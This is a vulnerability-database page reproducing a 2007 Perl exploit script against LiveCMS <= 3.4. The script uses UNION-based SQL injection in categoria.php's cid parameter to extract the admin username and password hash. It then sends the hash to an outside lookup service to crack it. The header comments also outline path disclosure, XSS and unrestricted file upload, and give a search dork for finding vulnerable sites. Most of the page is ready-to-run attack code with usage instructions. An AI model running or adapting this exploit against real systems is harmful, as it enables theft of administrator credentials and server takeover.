Vulners
Lucene search
LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit
#!/usr/bin/perl
##############################################################################################
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
###############################################################################################
#INFO:
#Program Title ################################################################################
#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload
#
#Description ##################################################################################
#This is a free CMS system.
#
#Script Download ##############################################################################
#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460
#http://livecms.com
#
#Original Advisory #############################################################################
#http://www.g00ns-forum.net/showthread.php?t=9350
#
#Exploit #######################################################################################
#credz to Vipsta and Clorox for vulnerability
#[c]ode by TrinTiTTY (2007) www.g00ns.net
#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, <S>, Bernard, and everyone else at g00ns.net
#
#Details #######################################################################################
#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined
#variable. example: categoria.php?cid='
#XSS: Article names are not properly santised, a user could insert malicious javascript
#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types
#can be uploaded. A user could upload a malicious script with this method and compromise the server.
#GoogleDork: "powered by livecms"
#
################################################################################################
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# LiveCMS <= 3.3 [ categoria.php ] #
# ] Remote SQL Injection [ #
# #
# [c]ode by TrinTiTTY [at] g00ns.net #
# Vulnerability by Vipsta and Clorox #
# #
# #
# [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
use LWP;
$host = @ARGV[0];
$ua = LWP::UserAgent->new;
my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
if (@ARGV < 1){&top( );&usage( )}
elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
else { &getUser( ) }
sub getUser( ) {
system("color 4");
&top( );
print "\n [~] Retrieving admin username\n";
$nameres = $ua->get("http://$host/$uject");
$namecon = $nameres->content;
if ($namecon =~ /<td>(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi)
{
$user = $4;
print "\n [+] Admin user retrieved: $user\n";
print "\n [~] Retrieving password for $user\n";
getPass( )
}
else {
print "\n [-] Unable to retrieve admin username\n";
print "\n [~] Retrieving password\n";
getPass( )
}
}
sub getPass( ) {
$passres = $ua->get("http://$host/$pject");
$passCon = $passres->content;
if ($passCon =~ /<td>(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi)
{
$pass = $4;
print "\n [+] Admin password retrieved: $pass\n";
&resolveHash($pass);
system("color 7");
}
else {
print "\n [-] Unable to retrieve admin password\n";
system("color 7");
exit(0);
}
}
sub resolveHash($)
{
print "\n [~] Attempting to resolve hash\n";
$hashget = LWP::UserAgent->new; #thx gdata
$resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash
$hashans = $resp->content;
if ($hashans =~ m\width="35%"><b>([ -_a-z0-9.*?&=;<>/""]{1,25})</b></td>\){
$crack = $1;
print "\n [+] Password hash resolved: $crack\n";
system("color 7");
exit(0);
}
else {
print "\n [-] Couldn't resolve hash\n";
system("color 7");
exit(0);
}
}
sub top( )
{
print q {
##################################################################
# LiveCMS <= 3.3 [ categoria.php ] #
# ] Remote SQL Injection [ #
# #
# [c]ode by TrinTiTTY [at] g00ns.net #
# Vulnerability by Vipsta and Clorox #
##################################################################
}
}
sub usage( )
{
print "\n Usage: perl livecms33.pl <host>\n";
print "\n Example: perl livecms33.pl www.example.com/path\n\n";
exit(0);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Jun 2007 00:00Current
7.1High risk
Vulners AI Score7.1